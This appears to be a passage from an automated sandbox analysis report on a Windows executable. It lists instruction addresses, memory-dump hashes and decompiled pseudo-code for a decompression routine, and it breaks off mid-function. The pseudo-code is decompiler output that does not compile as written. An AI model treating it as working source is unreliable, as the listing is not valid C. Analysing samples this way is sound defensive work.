                                                                                        0x00406307
                                                                                        0x00406305
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406347
                                                                                        0x00406347
                                                                                        0x0040634b
                                                                                        0x00406953
                                                                                        0x00406953
                                                                                        0x00000000
                                                                                        0x00406953
                                                                                        0x00406351
                                                                                        0x00406351
                                                                                        0x00406354
                                                                                        0x00406357
                                                                                        0x0040635b
                                                                                        0x0040635e
                                                                                        0x00406364
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406369
                                                                                        0x0040636c
                                                                                        0x0040636c
                                                                                        0x00406372
                                                                                        0x00406310
                                                                                        0x00406310
                                                                                        0x00406313
                                                                                        0x00000000
                                                                                        0x00406313
                                                                                        0x00406374
                                                                                        0x00406374
                                                                                        0x00406377
                                                                                        0x0040637a
                                                                                        0x0040637d
                                                                                        0x00406380
                                                                                        0x00406383
                                                                                        0x00406386
                                                                                        0x00406389
                                                                                        0x0040638c
                                                                                        0x0040638f
                                                                                        0x00406392
                                                                                        0x004063aa
                                                                                        0x004063ad
                                                                                        0x004063b0
                                                                                        0x004063b3
                                                                                        0x004063b3
                                                                                        0x004063b6
                                                                                        0x004063ba
                                                                                        0x004063bc
                                                                                        0x00406394
                                                                                        0x00406394
                                                                                        0x0040639c
                                                                                        0x004063a1
                                                                                        0x004063a3
                                                                                        0x004063a5
                                                                                        0x004063a5
                                                                                        0x004063bf
                                                                                        0x004063c6
                                                                                        0x004063c9
                                                                                        0x00000000
                                                                                        0x004063cb
                                                                                        0x004063cb
                                                                                        0x00000000
                                                                                        0x004063cb
                                                                                        0x00000000
                                                                                        0x00406658
                                                                                        0x00406658
                                                                                        0x0040665c
                                                                                        0x00406983
                                                                                        0x00406983
                                                                                        0x00000000
                                                                                        0x00406983
                                                                                        0x00406662
                                                                                        0x00406662
                                                                                        0x00406665
                                                                                        0x00406668
                                                                                        0x0040666c
                                                                                        0x0040666f
                                                                                        0x00406675
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x0040667a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406428
                                                                                        0x00406428
                                                                                        0x0040642b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406767
                                                                                        0x00406767
                                                                                        0x0040676b
                                                                                        0x0040678d
                                                                                        0x0040678d
                                                                                        0x00406790
                                                                                        0x0040679a
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x0040676d
                                                                                        0x0040676d
                                                                                        0x00406770
                                                                                        0x00406774
                                                                                        0x00406777
                                                                                        0x00406777
                                                                                        0x0040677a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406824
                                                                                        0x00406824
                                                                                        0x00406828
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x0040684d
                                                                                        0x00406854
                                                                                        0x0040685b
                                                                                        0x0040685b
                                                                                        0x00406862
                                                                                        0x00406865
                                                                                        0x0040686c
                                                                                        0x00000000
                                                                                        0x0040686f
                                                                                        0x0040682a
                                                                                        0x0040682a
                                                                                        0x0040682d
                                                                                        0x00406830
                                                                                        0x00406833
                                                                                        0x0040683a
                                                                                        0x0040677e
                                                                                        0x0040677e
                                                                                        0x00406781
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406915
                                                                                        0x00406915
                                                                                        0x00406918
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00000000
                                                                                        0x0040681f
                                                                                        0x00000000
                                                                                        0x0040654f
                                                                                        0x0040654f
                                                                                        0x00406551
                                                                                        0x00406558
                                                                                        0x00406559
                                                                                        0x0040655b
                                                                                        0x0040655e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406862
                                                                                        0x00406862
                                                                                        0x00406865
                                                                                        0x0040686c
                                                                                        0x00000000
                                                                                        0x0040686f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406594
                                                                                        0x00406594
                                                                                        0x00406597
                                                                                        0x004065cd
                                                                                        0x004065cd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x00406700
                                                                                        0x00406700
                                                                                        0x00406703
                                                                                        0x00406705
                                                                                        0x0040698f
                                                                                        0x0040698f
                                                                                        0x00000000
                                                                                        0x0040698f
                                                                                        0x0040670b
                                                                                        0x0040670b
                                                                                        0x0040670e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406714
                                                                                        0x00406714
                                                                                        0x00406718
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x00000000
                                                                                        0x0040671b
                                                                                        0x00406599
                                                                                        0x00406599
                                                                                        0x0040659b
                                                                                        0x0040659d
                                                                                        0x0040659f
                                                                                        0x004065a2
                                                                                        0x004065a3
                                                                                        0x004065a5
                                                                                        0x004065a7
                                                                                        0x004065aa
                                                                                        0x004065ad
                                                                                        0x004065c3
                                                                                        0x004065c3
                                                                                        0x004065c8
                                                                                        0x00406600
                                                                                        0x00406600
                                                                                        0x00406604
                                                                                        0x0040662d
                                                                                        0x00406630
                                                                                        0x00406632
                                                                                        0x00406639
                                                                                        0x0040663c
                                                                                        0x0040663f
                                                                                        0x0040663f
                                                                                        0x00406644
                                                                                        0x00406644
                                                                                        0x00406646
                                                                                        0x00406649
                                                                                        0x00406650
                                                                                        0x00406653
                                                                                        0x00406680
                                                                                        0x00406680
                                                                                        0x00406683
                                                                                        0x00406686
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x00000000
                                                                                        0x004066fa
                                                                                        0x00406688
                                                                                        0x00406688
                                                                                        0x0040668e
                                                                                        0x00406691
                                                                                        0x00406694
                                                                                        0x00406697
                                                                                        0x0040669a
                                                                                        0x0040669d
                                                                                        0x004066a0
                                                                                        0x004066a3
                                                                                        0x004066a6
                                                                                        0x004066a9
                                                                                        0x004066c2
                                                                                        0x004066c4
                                                                                        0x004066c7
                                                                                        0x004066c8
                                                                                        0x004066cb
                                                                                        0x004066cd
                                                                                        0x004066d0
                                                                                        0x004066d2
                                                                                        0x004066d4
                                                                                        0x004066d7
                                                                                        0x004066d9
                                                                                        0x004066dc
                                                                                        0x004066e0
                                                                                        0x004066e2
                                                                                        0x004066e2
                                                                                        0x004066e3
                                                                                        0x004066e6
                                                                                        0x004066e9
                                                                                        0x004066ab
                                                                                        0x004066ab
                                                                                        0x004066b3
                                                                                        0x004066b8
                                                                                        0x004066ba
                                                                                        0x004066bd
                                                                                        0x004066bd
                                                                                        0x004066ec
                                                                                        0x004066f3
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x004066f5
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x004066f3
                                                                                        0x00406606
                                                                                        0x00406606
                                                                                        0x00406609
                                                                                        0x0040660b
                                                                                        0x0040660e
                                                                                        0x00406611
                                                                                        0x00406614
                                                                                        0x00406616
                                                                                        0x00406619
                                                                                        0x0040661c
                                                                                        0x0040661c
                                                                                        0x0040661f
                                                                                        0x0040661f
                                                                                        0x00406622
                                                                                        0x00406629
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x0040662b
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00406629
                                                                                        0x004065af
                                                                                        0x004065af
                                                                                        0x004065b2
                                                                                        0x004065b4
                                                                                        0x004065b7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406316
                                                                                        0x00406316
                                                                                        0x0040631a
                                                                                        0x0040695f
                                                                                        0x0040695f
                                                                                        0x00000000
                                                                                        0x0040695f
                                                                                        0x00406320
                                                                                        0x00406320
                                                                                        0x00406323
                                                                                        0x00406326
                                                                                        0x00406329
                                                                                        0x0040632c
                                                                                        0x0040632f
                                                                                        0x00406332
                                                                                        0x00406334
                                                                                        0x00406337
                                                                                        0x0040633a
                                                                                        0x0040633d
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004064a1
                                                                                        0x004064a1
                                                                                        0x004064a5
                                                                                        0x0040696b
                                                                                        0x0040696b
                                                                                        0x00000000
                                                                                        0x0040696b
                                                                                        0x004064ab
                                                                                        0x004064ab
                                                                                        0x004064ae
                                                                                        0x004064b1
                                                                                        0x004064b4
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b9
                                                                                        0x004064bc
                                                                                        0x004064bf
                                                                                        0x004064c2
                                                                                        0x004064c5
                                                                                        0x004064c8
                                                                                        0x004064c9
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064ce
                                                                                        0x004064d1
                                                                                        0x004064d4
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064da
                                                                                        0x004064dc
                                                                                        0x004064dc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x00406722
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406728
                                                                                        0x00406728
                                                                                        0x0040672b
                                                                                        0x0040672e
                                                                                        0x00406731
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406736
                                                                                        0x00406739
                                                                                        0x0040673c
                                                                                        0x0040673f
                                                                                        0x00406742
                                                                                        0x00406745
                                                                                        0x00406746
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x0040674b
                                                                                        0x0040674e
                                                                                        0x00406751
                                                                                        0x00406754
                                                                                        0x00406757
                                                                                        0x0040675b
                                                                                        0x0040675d
                                                                                        0x00406760
                                                                                        0x00000000
                                                                                        0x00406762
                                                                                        0x00406762
                                                                                        0x004064df
                                                                                        0x004064df
                                                                                        0x00000000
                                                                                        0x004064df
                                                                                        0x00406760
                                                                                        0x00406995
                                                                                        0x00406995
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fc4
                                                                                        0x004069cc
                                                                                        0x004069cc
                                                                                        0x00000000
                                                                                        0x004069cc
                                                                                        0x00406819
                                                                                        0x00406899
                                                                                        0x00406862

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                        • Instruction ID: 319d18918fa2cc3741333e20ed782d5c303dd2f769888eebbc994f2124d7c2e6
                                                                                        • Opcode Fuzzy Hash: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                        • Instruction Fuzzy Hash: 29A15171E00229CBDF28CFA8C8547ADBBB1FF44305F15812AD856BB281D7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 98%
                                                                                        			E00406767() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
